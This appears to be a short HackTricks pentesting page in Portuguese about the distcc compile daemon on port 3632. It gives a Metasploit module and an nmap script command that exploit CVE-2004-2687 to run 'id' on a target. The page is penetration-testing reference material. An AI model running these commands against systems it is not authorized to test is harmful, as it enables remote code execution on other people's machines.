hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2023-06-06 18:56:34 +00:00

2.6 KiB

Informação Básica

O Distcc é projetado para acelerar a compilação aproveitando o poder de processamento não utilizado em outros computadores. Uma máquina com o Distcc instalado pode enviar código para ser compilado pela rede para um computador que tenha o daemon Distccd e um compilador compatível instalado.

Porta padrão: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploração

Verifique se é vulnerável ao CVE-2004-2687 para executar código arbitrário:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

Não acredito que o Shodan detecte este serviço.

Recursos

Post criado por Álex B (@r1p)

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥